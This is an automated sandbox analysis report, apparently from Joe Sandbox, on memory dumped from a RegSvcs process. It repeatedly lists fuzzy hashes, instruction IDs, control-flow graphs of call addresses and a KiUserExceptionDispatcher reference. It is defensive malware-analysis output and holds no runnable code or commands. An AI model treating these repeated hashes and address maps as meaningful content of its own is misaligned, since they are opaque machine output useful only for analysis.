                                                                                          • Opcode Fuzzy Hash: 19718c4ff86c16b620bc13e2ba4dc0f7f841de7ae31ad4204954b466063cb5b1
                                                                                          • Instruction Fuzzy Hash: C102A43490522CCFCB66DF68C988AA9F772BF49305F2089E9D40AA7750DB319E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 3877 3f7550-3f75f5 call 3fb070 4034 3f75f5 call 3fb71d 3877->4034 4035 3f75f5 call 3fba08 3877->4035 4036 3f75f5 call 3fba68 3877->4036 4037 3f75f5 call 3fb967 3877->4037 4038 3f75f5 call 3fb720 3877->4038 3887 3f75fb-3f767f call 3fc790 4050 3f767f call c22d02 3887->4050 4051 3f767f call c22d10 3887->4051 4052 3f767f call c22d6f 3887->4052 3893 3f7685-3f7700 call c22ec8 4064 3f7700 call c23050 3893->4064 4065 3f7700 call c22ff0 3893->4065 3899 3f7706-3f7745 4076 3f7745 call c23857 3899->4076 4077 3f7745 call c237f8 3899->4077 4078 3f7745 call c23748 3899->4078 3902 3f774b-3f778a 4081 3f778a call c23977 3902->4081 4082 3f778a call c238b8 3902->4082 4083 3f778a call c23918 3902->4083 3905 3f7790-3f77cf 4087 3f77cf call c239d8 3905->4087 4088 3f77cf call c23a38 3905->4088 3908 3f77d5-3f789e 4019 3f789e call c24390 3908->4019 4020 3f789e call c2432e 3908->4020 3917 3f78a4-3f7928 4026 3f7928 call c24820 3917->4026 4027 3f7928 call c24830 3917->4027 4028 3f7928 call c24927 3917->4028 4029 3f7928 call c248c8 3917->4029 3923 3f792e-3f79c8 KiUserExceptionDispatcher 4043 3f79c8 call c24da0 3923->4043 4044 3f79c8 call c24e68 3923->4044 3929 3f79ce-3f7a0d 4053 3f7a0d call c24f88 3929->4053 4054 3f7a0d call c24f29 3929->4054 3932 3f7a13-3f7a97 4066 3f7a97 call c25490 3932->4066 4067 3f7a97 call c252e8 3932->4067 4068 3f7a97 call c25348 3932->4068 4069 3f7a97 call c25758 3932->4069 4070 3f7a97 call c25659 3932->4070 3938 3f7a9d-3f7b21 4084 3f7b21 call c265d0 3938->4084 4085 3f7b21 call c265c8 3938->4085 3944 3f7b27-3f7bf6 4091 3f7bf6 call c27958 3944->4091 4092 3f7bf6 call c27aa8 3944->4092 3953 3f7bfc-3f7c3e 4021 3f7c3e call c27d98 3953->4021 4022 3f7c3e call c27da8 3953->4022 3956 3f7c44-3f7cc2 4030 3f7cc2 call c29760 3956->4030 4031 3f7cc2 call c297b8 3956->4031 3962 3f7cc8-3f7d52 call c29a40 4045 3f7d52 call c2a320 3962->4045 4046 3f7d52 call c2a330 3962->4046 4047 3f7d52 call c29d88 3962->4047 4048 3f7d52 call c29e6c 3962->4048 4049 3f7d52 call c29e1c 3962->4049 3968 3f7d58-3f7dd6 4056 3f7dd6 call c2aed0 3968->4056 4057 3f7dd6 call c2ae20 3968->4057 3974 3f7ddc-3f7e1e 4071 3f7e1e call c2aff0 3974->4071 4072 3f7e1e call c2af9c 3974->4072 3977 3f7e24-3f7e66 4079 3f7e66 call c2aff0 3977->4079 4080 3f7e66 call c2af9c 3977->4080 3980 3f7e6c-3f7f26 call c2b831 4089 3f7f26 call c2ce50 3980->4089 4090 3f7f26 call c2ce4c 3980->4090 3989 3f7f2c-3f7f6e 4093 3f7f6e call c2e238 3989->4093 4094 3f7f6e call c2dfa8 3989->4094 3992 3f7f74-3f7ffe 4024 3f7ffe call c2e5d0 3992->4024 4025 3f7ffe call c2e570 3992->4025 3998 3f8004-3f8046 4032 3f8046 call c2e9f8 3998->4032 4033 3f8046 call c2e998 3998->4033 4001 3f804c-3f808e 4040 3f808e call c2ef30 4001->4040 4041 3f808e call c2ecc1 4001->4041 4004 3f8094-3f815a 4058 3f815a call c2f6a0 4004->4058 4059 3f815a call c2f977 4004->4059 4060 3f815a call c2f198 4004->4060 4061 3f815a call c2f8b8 4004->4061 4062 3f815a call c2f918 4004->4062 4063 3f815a call c2f18e 4004->4063 4013 3f8160-3f81a2 4073 3f81a2 call c2fa97 4013->4073 4074 3f81a2 call c2f9d8 4013->4074 4075 3f81a2 call c2fa38 4013->4075 4016 3f81a8-3f81f7 4019->3917 4020->3917 4021->3956 4022->3956 4024->3998 4025->3998 4026->3923 4027->3923 4028->3923 4029->3923 4030->3962 4031->3962 4032->4001 4033->4001 4034->3887 4035->3887 4036->3887 4037->3887 4038->3887 4040->4004 4041->4004 4043->3929 4044->3929 4045->3968 4046->3968 4047->3968 4048->3968 4049->3968 4050->3893 4051->3893 4052->3893 4053->3932 4054->3932 4056->3974 4057->3974 4058->4013 4059->4013 4060->4013 4061->4013 4062->4013 4063->4013 4064->3899 4065->3899 4066->3938 4067->3938 4068->3938 4069->3938 4070->3938 4071->3977 4072->3977 4073->4016 4074->4016 4075->4016 4076->3902 4077->3902 4078->3902 4079->3980 4080->3980 4081->3905 4082->3905 4083->3905 4084->3944 4085->3944 4087->3908 4088->3908 4089->3989 4090->3989 4091->3953 4092->3953 4093->3992 4094->3992
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 4e2ac94bb10088ac5df06451ab2894003f57fbe716ee6c80477ad9d678dba1bf
                                                                                          • Instruction ID: d96e85650ced49239ea2fea7fc1a2b8dc609636e668f220cc54476f92e8d8b9d
                                                                                          • Opcode Fuzzy Hash: 4e2ac94bb10088ac5df06451ab2894003f57fbe716ee6c80477ad9d678dba1bf
                                                                                          • Instruction Fuzzy Hash: 8502B53490522CCFCB65DF68C988AA9F772BF49305F2089E9D40AA7750DB319E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 4095 3f758c-3f75f5 4244 3f75f5 call 3fb71d 4095->4244 4245 3f75f5 call 3fba08 4095->4245 4246 3f75f5 call 3fba68 4095->4246 4247 3f75f5 call 3fb967 4095->4247 4248 3f75f5 call 3fb720 4095->4248 4102 3f75fb-3f767f call 3fc790 4260 3f767f call c22d02 4102->4260 4261 3f767f call c22d10 4102->4261 4262 3f767f call c22d6f 4102->4262 4108 3f7685-3f7700 call c22ec8 4274 3f7700 call c23050 4108->4274 4275 3f7700 call c22ff0 4108->4275 4114 3f7706-3f7745 4286 3f7745 call c23857 4114->4286 4287 3f7745 call c237f8 4114->4287 4288 3f7745 call c23748 4114->4288 4117 3f774b-3f778a 4291 3f778a call c23977 4117->4291 4292 3f778a call c238b8 4117->4292 4293 3f778a call c23918 4117->4293 4120 3f7790-3f77cf 4297 3f77cf call c239d8 4120->4297 4298 3f77cf call c23a38 4120->4298 4123 3f77d5-3f789e 4305 3f789e call c24390 4123->4305 4306 3f789e call c2432e 4123->4306 4132 3f78a4-3f7928 4236 3f7928 call c24820 4132->4236 4237 3f7928 call c24830 4132->4237 4238 3f7928 call c24927 4132->4238 4239 3f7928 call c248c8 4132->4239 4138 3f792e-3f79c8 KiUserExceptionDispatcher 4253 3f79c8 call c24da0 4138->4253 4254 3f79c8 call c24e68 4138->4254 4144 3f79ce-3f7a0d 4263 3f7a0d call c24f88 4144->4263 4264 3f7a0d call c24f29 4144->4264 4147 3f7a13-3f7a97 4276 3f7a97 call c25490 4147->4276 4277 3f7a97 call c252e8 4147->4277 4278 3f7a97 call c25348 4147->4278 4279 3f7a97 call c25758 4147->4279 4280 3f7a97 call c25659 4147->4280 4153 3f7a9d-3f7b21 4294 3f7b21 call c265d0 4153->4294 4295 3f7b21 call c265c8 4153->4295 4159 3f7b27-3f7bf6 4301 3f7bf6 call c27958 4159->4301 4302 3f7bf6 call c27aa8 4159->4302 4168 3f7bfc-3f7c3e 4307 3f7c3e call c27d98 4168->4307 4308 3f7c3e call c27da8 4168->4308 4171 3f7c44-3f7cc2 4240 3f7cc2 call c29760 4171->4240 4241 3f7cc2 call c297b8 4171->4241 4177 3f7cc8-3f7d52 call c29a40 4255 3f7d52 call c2a320 4177->4255 4256 3f7d52 call c2a330 4177->4256 4257 3f7d52 call c29d88 4177->4257 4258 3f7d52 call c29e6c 4177->4258 4259 3f7d52 call c29e1c 4177->4259 4183 3f7d58-3f7dd6 4266 3f7dd6 call c2aed0 4183->4266 4267 3f7dd6 call c2ae20 4183->4267 4189 3f7ddc-3f7e1e 4281 3f7e1e call c2aff0 4189->4281 4282 3f7e1e call c2af9c 4189->4282 4192 3f7e24-3f7e66 4289 3f7e66 call c2aff0 4192->4289 4290 3f7e66 call c2af9c 4192->4290 4195 3f7e6c-3f7f26 call c2b831 4299 3f7f26 call c2ce50 4195->4299 4300 3f7f26 call c2ce4c 4195->4300 4204 3f7f2c-3f7f6e 4303 3f7f6e call c2e238 4204->4303 4304 3f7f6e call c2dfa8 4204->4304 4207 3f7f74-3f7ffe 4234 3f7ffe call c2e5d0 4207->4234 4235 3f7ffe call c2e570 4207->4235 4213 3f8004-3f8046 4242 3f8046 call c2e9f8 4213->4242 4243 3f8046 call c2e998 4213->4243 4216 3f804c-3f808e 4250 3f808e call c2ef30 4216->4250 4251 3f808e call c2ecc1 4216->4251 4219 3f8094-3f815a 4268 3f815a call c2f6a0 4219->4268 4269 3f815a call c2f977 4219->4269 4270 3f815a call c2f198 4219->4270 4271 3f815a call c2f8b8 4219->4271 4272 3f815a call c2f918 4219->4272 4273 3f815a call c2f18e 4219->4273 4228 3f8160-3f81a2 4283 3f81a2 call c2fa97 4228->4283 4284 3f81a2 call c2f9d8 4228->4284 4285 3f81a2 call c2fa38 4228->4285 4231 3f81a8-3f81f7 4234->4213 4235->4213 4236->4138 4237->4138 4238->4138 4239->4138 4240->4177 4241->4177 4242->4216 4243->4216 4244->4102 4245->4102 4246->4102 4247->4102 4248->4102 4250->4219 4251->4219 4253->4144 4254->4144 4255->4183 4256->4183 4257->4183 4258->4183 4259->4183 4260->4108 4261->4108 4262->4108 4263->4147 4264->4147 4266->4189 4267->4189 4268->4228 4269->4228 4270->4228 4271->4228 4272->4228 4273->4228 4274->4114 4275->4114 4276->4153 4277->4153 4278->4153 4279->4153 4280->4153 4281->4192 4282->4192 4283->4231 4284->4231 4285->4231 4286->4117 4287->4117 4288->4117 4289->4195 4290->4195 4291->4120 4292->4120 4293->4120 4294->4159 4295->4159 4297->4123 4298->4123 4299->4204 4300->4204 4301->4168 4302->4168 4303->4207 4304->4207 4305->4132 4306->4132 4307->4171 4308->4171
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 94116a3cf2362a56d0897352c7eb1652bc0f64fa6667fce4d089567627bc7fea
                                                                                          • Instruction ID: 8bcbc863ca52ff25a5fa6bf6f5767d44f9c387597b9c52d728e5c4dc9d57eee4
                                                                                          • Opcode Fuzzy Hash: 94116a3cf2362a56d0897352c7eb1652bc0f64fa6667fce4d089567627bc7fea
                                                                                          • Instruction Fuzzy Hash: 6202A53490522CCFCB66DF68C988AA9F772BF49305F2089E9D40AA7750DB319E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 4309 3f75d1-3f75f5 4467 3f75f5 call 3fb71d 4309->4467 4468 3f75f5 call 3fba08 4309->4468 4469 3f75f5 call 3fba68 4309->4469 4470 3f75f5 call 3fb967 4309->4470 4471 3f75f5 call 3fb720 4309->4471 4313 3f75fb-3f767f call 3fc790 4483 3f767f call c22d02 4313->4483 4484 3f767f call c22d10 4313->4484 4485 3f767f call c22d6f 4313->4485 4319 3f7685-3f7700 call c22ec8 4497 3f7700 call c23050 4319->4497 4498 3f7700 call c22ff0 4319->4498 4325 3f7706-3f7745 4509 3f7745 call c23857 4325->4509 4510 3f7745 call c237f8 4325->4510 4511 3f7745 call c23748 4325->4511 4328 3f774b-3f778a 4514 3f778a call c23977 4328->4514 4515 3f778a call c238b8 4328->4515 4516 3f778a call c23918 4328->4516 4331 3f7790-3f77cf 4445 3f77cf call c239d8 4331->4445 4446 3f77cf call c23a38 4331->4446 4334 3f77d5-3f789e 4453 3f789e call c24390 4334->4453 4454 3f789e call c2432e 4334->4454 4343 3f78a4-3f7928 4459 3f7928 call c24820 4343->4459 4460 3f7928 call c24830 4343->4460 4461 3f7928 call c24927 4343->4461 4462 3f7928 call c248c8 4343->4462 4349 3f792e-3f79c8 KiUserExceptionDispatcher 4476 3f79c8 call c24da0 4349->4476 4477 3f79c8 call c24e68 4349->4477 4355 3f79ce-3f7a0d 4486 3f7a0d call c24f88 4355->4486 4487 3f7a0d call c24f29 4355->4487 4358 3f7a13-3f7a97 4499 3f7a97 call c25490 4358->4499 4500 3f7a97 call c252e8 4358->4500 4501 3f7a97 call c25348 4358->4501 4502 3f7a97 call c25758 4358->4502 4503 3f7a97 call c25659 4358->4503 4364 3f7a9d-3f7b21 4517 3f7b21 call c265d0 4364->4517 4518 3f7b21 call c265c8 4364->4518 4370 3f7b27-3f7bf6 4449 3f7bf6 call c27958 4370->4449 4450 3f7bf6 call c27aa8 4370->4450 4379 3f7bfc-3f7c3e 4455 3f7c3e call c27d98 4379->4455 4456 3f7c3e call c27da8 4379->4456 4382 3f7c44-3f7cc2 4463 3f7cc2 call c29760 4382->4463 4464 3f7cc2 call c297b8 4382->4464 4388 3f7cc8-3f7d52 call c29a40 4478 3f7d52 call c2a320 4388->4478 4479 3f7d52 call c2a330 4388->4479 4480 3f7d52 call c29d88 4388->4480 4481 3f7d52 call c29e6c 4388->4481 4482 3f7d52 call c29e1c 4388->4482 4394 3f7d58-3f7dd6 4489 3f7dd6 call c2aed0 4394->4489 4490 3f7dd6 call c2ae20 4394->4490 4400 3f7ddc-3f7e1e 4504 3f7e1e call c2aff0 4400->4504 4505 3f7e1e call c2af9c 4400->4505 4403 3f7e24-3f7e66 4512 3f7e66 call c2aff0 4403->4512 4513 3f7e66 call c2af9c 4403->4513 4406 3f7e6c-3f7f26 call c2b831 4447 3f7f26 call c2ce50 4406->4447 4448 3f7f26 call c2ce4c 4406->4448 4415 3f7f2c-3f7f6e 4451 3f7f6e call c2e238 4415->4451 4452 3f7f6e call c2dfa8 4415->4452 4418 3f7f74-3f7ffe 4457 3f7ffe call c2e5d0 4418->4457 4458 3f7ffe call c2e570 4418->4458 4424 3f8004-3f8046 4465 3f8046 call c2e9f8 4424->4465 4466 3f8046 call c2e998 4424->4466 4427 3f804c-3f808e 4473 3f808e call c2ef30 4427->4473 4474 3f808e call c2ecc1 4427->4474 4430 3f8094-3f815a 4491 3f815a call c2f6a0 4430->4491 4492 3f815a call c2f977 4430->4492 4493 3f815a call c2f198 4430->4493 4494 3f815a call c2f8b8 4430->4494 4495 3f815a call c2f918 4430->4495 4496 3f815a call c2f18e 4430->4496 4439 3f8160-3f81a2 4506 3f81a2 call c2fa97 4439->4506 4507 3f81a2 call c2f9d8 4439->4507 4508 3f81a2 call c2fa38 4439->4508 4442 3f81a8-3f81f7 4445->4334 4446->4334 4447->4415 4448->4415 4449->4379 4450->4379 4451->4418 4452->4418 4453->4343 4454->4343 4455->4382 4456->4382 4457->4424 4458->4424 4459->4349 4460->4349 4461->4349 4462->4349 4463->4388 4464->4388 4465->4427 4466->4427 4467->4313 4468->4313 4469->4313 4470->4313 4471->4313 4473->4430 4474->4430 4476->4355 4477->4355 4478->4394 4479->4394 4480->4394 4481->4394 4482->4394 4483->4319 4484->4319 4485->4319 4486->4358 4487->4358 4489->4400 4490->4400 4491->4439 4492->4439 4493->4439 4494->4439 4495->4439 4496->4439 4497->4325 4498->4325 4499->4364 4500->4364 4501->4364 4502->4364 4503->4364 4504->4403 4505->4403 4506->4442 4507->4442 4508->4442 4509->4328 4510->4328 4511->4328 4512->4406 4513->4406 4514->4331 4515->4331 4516->4331 4517->4370 4518->4370
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: e0a13413a5c3bed4909ea18e753da2e9bc6014d9263cedb0d99c442867d1f02d
                                                                                          • Instruction ID: e288f33000e76dfa57401c35732f503a156cd6364dc3dbe012cc208dfd96c257
                                                                                          • Opcode Fuzzy Hash: e0a13413a5c3bed4909ea18e753da2e9bc6014d9263cedb0d99c442867d1f02d
                                                                                          • Instruction Fuzzy Hash: 7802B43490522CCFCB66DF68C988AA9F772BF49305F2089E9D40AA7750DB319E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 4520 3f7616-3f767f call 3fc790 4684 3f767f call c22d02 4520->4684 4685 3f767f call c22d10 4520->4685 4686 3f767f call c22d6f 4520->4686 4527 3f7685-3f7700 call c22ec8 4698 3f7700 call c23050 4527->4698 4699 3f7700 call c22ff0 4527->4699 4533 3f7706-3f7745 4710 3f7745 call c23857 4533->4710 4711 3f7745 call c237f8 4533->4711 4712 3f7745 call c23748 4533->4712 4536 3f774b-3f778a 4715 3f778a call c23977 4536->4715 4716 3f778a call c238b8 4536->4716 4717 3f778a call c23918 4536->4717 4539 3f7790-3f77cf 4721 3f77cf call c239d8 4539->4721 4722 3f77cf call c23a38 4539->4722 4542 3f77d5-3f789e 4659 3f789e call c24390 4542->4659 4660 3f789e call c2432e 4542->4660 4551 3f78a4-3f7928 4665 3f7928 call c24820 4551->4665 4666 3f7928 call c24830 4551->4666 4667 3f7928 call c24927 4551->4667 4668 3f7928 call c248c8 4551->4668 4557 3f792e-3f79c8 KiUserExceptionDispatcher 4677 3f79c8 call c24da0 4557->4677 4678 3f79c8 call c24e68 4557->4678 4563 3f79ce-3f7a0d 4687 3f7a0d call c24f88 4563->4687 4688 3f7a0d call c24f29 4563->4688 4566 3f7a13-3f7a97 4700 3f7a97 call c25490 4566->4700 4701 3f7a97 call c252e8 4566->4701 4702 3f7a97 call c25348 4566->4702 4703 3f7a97 call c25758 4566->4703 4704 3f7a97 call c25659 4566->4704 4572 3f7a9d-3f7b21 4718 3f7b21 call c265d0 4572->4718 4719 3f7b21 call c265c8 4572->4719 4578 3f7b27-3f7bf6 4655 3f7bf6 call c27958 4578->4655 4656 3f7bf6 call c27aa8 4578->4656 4587 3f7bfc-3f7c3e 4661 3f7c3e call c27d98 4587->4661 4662 3f7c3e call c27da8 4587->4662 4590 3f7c44-3f7cc2 4669 3f7cc2 call c29760 4590->4669 4670 3f7cc2 call c297b8 4590->4670 4596 3f7cc8-3f7d52 call c29a40 4679 3f7d52 call c2a320 4596->4679 4680 3f7d52 call c2a330 4596->4680 4681 3f7d52 call c29d88 4596->4681 4682 3f7d52 call c29e6c 4596->4682 4683 3f7d52 call c29e1c 4596->4683 4602 3f7d58-3f7dd6 4690 3f7dd6 call c2aed0 4602->4690 4691 3f7dd6 call c2ae20 4602->4691 4608 3f7ddc-3f7e1e 4705 3f7e1e call c2aff0 4608->4705 4706 3f7e1e call c2af9c 4608->4706 4611 3f7e24-3f7e66 4713 3f7e66 call c2aff0 4611->4713 4714 3f7e66 call c2af9c 4611->4714 4614 3f7e6c-3f7f26 call c2b831 4653 3f7f26 call c2ce50 4614->4653 4654 3f7f26 call c2ce4c 4614->4654 4623 3f7f2c-3f7f6e 4657 3f7f6e call c2e238 4623->4657 4658 3f7f6e call c2dfa8 4623->4658 4626 3f7f74-3f7ffe 4663 3f7ffe call c2e5d0 4626->4663 4664 3f7ffe call c2e570 4626->4664 4632 3f8004-3f8046 4671 3f8046 call c2e9f8 4632->4671 4672 3f8046 call c2e998 4632->4672 4635 3f804c-3f808e 4674 3f808e call c2ef30 4635->4674 4675 3f808e call c2ecc1 4635->4675 4638 3f8094-3f815a 4692 3f815a call c2f6a0 4638->4692 4693 3f815a call c2f977 4638->4693 4694 3f815a call c2f198 4638->4694 4695 3f815a call c2f8b8 4638->4695 4696 3f815a call c2f918 4638->4696 4697 3f815a call c2f18e 4638->4697 4647 3f8160-3f81a2 4707 3f81a2 call c2fa97 4647->4707 4708 3f81a2 call c2f9d8 4647->4708 4709 3f81a2 call c2fa38 4647->4709 4650 3f81a8-3f81f7 4653->4623 4654->4623 4655->4587 4656->4587 4657->4626 4658->4626 4659->4551 4660->4551 4661->4590 4662->4590 4663->4632 4664->4632 4665->4557 4666->4557 4667->4557 4668->4557 4669->4596 4670->4596 4671->4635 4672->4635 4674->4638 4675->4638 4677->4563 4678->4563 4679->4602 4680->4602 4681->4602 4682->4602 4683->4602 4684->4527 4685->4527 4686->4527 4687->4566 4688->4566 4690->4608 4691->4608 4692->4647 4693->4647 4694->4647 4695->4647 4696->4647 4697->4647 4698->4533 4699->4533 4700->4572 4701->4572 4702->4572 4703->4572 4704->4572 4705->4611 4706->4611 4707->4650 4708->4650 4709->4650 4710->4536 4711->4536 4712->4536 4713->4614 4714->4614 4715->4539 4716->4539 4717->4539 4718->4578 4719->4578 4721->4542 4722->4542
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 1d4b09bdf3a037a692958861a088319af4930e6cf0cc842cce9728fbe3d6e7e8
                                                                                          • Instruction ID: 5339f03a4cb2e45aac1b3c8b0a23fa5875d45b1667c587682666fcd1800ad6d0
                                                                                          • Opcode Fuzzy Hash: 1d4b09bdf3a037a692958861a088319af4930e6cf0cc842cce9728fbe3d6e7e8
                                                                                          • Instruction Fuzzy Hash: 3BF1B43490522CCFCB66DF68C988AA9F772BF49305F2089E9D40AA7750DB319E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 4723 3f765b-3f767f 4893 3f767f call c22d02 4723->4893 4894 3f767f call c22d10 4723->4894 4895 3f767f call c22d6f 4723->4895 4727 3f7685-3f7700 call c22ec8 4907 3f7700 call c23050 4727->4907 4908 3f7700 call c22ff0 4727->4908 4733 3f7706-3f7745 4919 3f7745 call c23857 4733->4919 4920 3f7745 call c237f8 4733->4920 4921 3f7745 call c23748 4733->4921 4736 3f774b-3f778a 4855 3f778a call c23977 4736->4855 4856 3f778a call c238b8 4736->4856 4857 3f778a call c23918 4736->4857 4739 3f7790-3f77cf 4861 3f77cf call c239d8 4739->4861 4862 3f77cf call c23a38 4739->4862 4742 3f77d5-3f789e 4869 3f789e call c24390 4742->4869 4870 3f789e call c2432e 4742->4870 4751 3f78a4-3f7928 4875 3f7928 call c24820 4751->4875 4876 3f7928 call c24830 4751->4876 4877 3f7928 call c24927 4751->4877 4878 3f7928 call c248c8 4751->4878 4757 3f792e-3f79c8 KiUserExceptionDispatcher 4886 3f79c8 call c24da0 4757->4886 4887 3f79c8 call c24e68 4757->4887 4763 3f79ce-3f7a0d 4896 3f7a0d call c24f88 4763->4896 4897 3f7a0d call c24f29 4763->4897 4766 3f7a13-3f7a97 4909 3f7a97 call c25490 4766->4909 4910 3f7a97 call c252e8 4766->4910 4911 3f7a97 call c25348 4766->4911 4912 3f7a97 call c25758 4766->4912 4913 3f7a97 call c25659 4766->4913 4772 3f7a9d-3f7b21 4858 3f7b21 call c265d0 4772->4858 4859 3f7b21 call c265c8 4772->4859 4778 3f7b27-3f7bf6 4865 3f7bf6 call c27958 4778->4865 4866 3f7bf6 call c27aa8 4778->4866 4787 3f7bfc-3f7c3e 4871 3f7c3e call c27d98 4787->4871 4872 3f7c3e call c27da8 4787->4872 4790 3f7c44-3f7cc2 4879 3f7cc2 call c29760 4790->4879 4880 3f7cc2 call c297b8 4790->4880 4796 3f7cc8-3f7d52 call c29a40 4888 3f7d52 call c2a320 4796->4888 4889 3f7d52 call c2a330 4796->4889 4890 3f7d52 call c29d88 4796->4890 4891 3f7d52 call c29e6c 4796->4891 4892 3f7d52 call c29e1c 4796->4892 4802 3f7d58-3f7dd6 4899 3f7dd6 call c2aed0 4802->4899 4900 3f7dd6 call c2ae20 4802->4900 4808 3f7ddc-3f7e1e 4914 3f7e1e call c2aff0 4808->4914 4915 3f7e1e call c2af9c 4808->4915 4811 3f7e24-3f7e66 4853 3f7e66 call c2aff0 4811->4853 4854 3f7e66 call c2af9c 4811->4854 4814 3f7e6c-3f7f26 call c2b831 4863 3f7f26 call c2ce50 4814->4863 4864 3f7f26 call c2ce4c 4814->4864 4823 3f7f2c-3f7f6e 4867 3f7f6e call c2e238 4823->4867 4868 3f7f6e call c2dfa8 4823->4868 4826 3f7f74-3f7ffe 4873 3f7ffe call c2e5d0 4826->4873 4874 3f7ffe call c2e570 4826->4874 4832 3f8004-3f8046 4881 3f8046 call c2e9f8 4832->4881 4882 3f8046 call c2e998 4832->4882 4835 3f804c-3f808e 4884 3f808e call c2ef30 4835->4884 4885 3f808e call c2ecc1 4835->4885 4838 3f8094-3f815a 4901 3f815a call c2f6a0 4838->4901 4902 3f815a call c2f977 4838->4902 4903 3f815a call c2f198 4838->4903 4904 3f815a call c2f8b8 4838->4904 4905 3f815a call c2f918 4838->4905 4906 3f815a call c2f18e 4838->4906 4847 3f8160-3f81a2 4916 3f81a2 call c2fa97 4847->4916 4917 3f81a2 call c2f9d8 4847->4917 4918 3f81a2 call c2fa38 4847->4918 4850 3f81a8-3f81f7 4853->4814 4854->4814 4855->4739 4856->4739 4857->4739 4858->4778 4859->4778 4861->4742 4862->4742 4863->4823 4864->4823 4865->4787 4866->4787 4867->4826 4868->4826 4869->4751 4870->4751 4871->4790 4872->4790 4873->4832 4874->4832 4875->4757 4876->4757 4877->4757 4878->4757 4879->4796 4880->4796 4881->4835 4882->4835 4884->4838 4885->4838 4886->4763 4887->4763 4888->4802 4889->4802 4890->4802 4891->4802 4892->4802 4893->4727 4894->4727 4895->4727 4896->4766 4897->4766 4899->4808 4900->4808 4901->4847 4902->4847 4903->4847 4904->4847 4905->4847 4906->4847 4907->4733 4908->4733 4909->4772 4910->4772 4911->4772 4912->4772 4913->4772 4914->4811 4915->4811 4916->4850 4917->4850 4918->4850 4919->4736 4920->4736 4921->4736
                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 451bb384ef13845297140c359cba94bd29fdbb7af8ced5b0c53f48235e7f9ad5
                                                                                          • Instruction ID: 50ea0fc169bc7952066dcd3f5237cecc76bcebb092dfa6b11f5e2fd3a321e9c3
                                                                                          • Opcode Fuzzy Hash: 451bb384ef13845297140c359cba94bd29fdbb7af8ced5b0c53f48235e7f9ad5
                                                                                          • Instruction Fuzzy Hash: 5DF1A53490522CCFCB65DF68C988AA9F7B2BF49305F2089E9D40AA7750DB319E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 003F796D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1190856478.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_3f0000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 37a634d3f728d03032c30b072f9e9fdcc5b1d455a0f1e38ee9fa65c93482d4e9
                                                                                          • Instruction ID: d68d4c3ce32152406fc870d244728a3676868f74a8c89bce457dc04870a4789a
                                                                                          • Opcode Fuzzy Hash: 37a634d3f728d03032c30b072f9e9fdcc5b1d455a0f1e38ee9fa65c93482d4e9
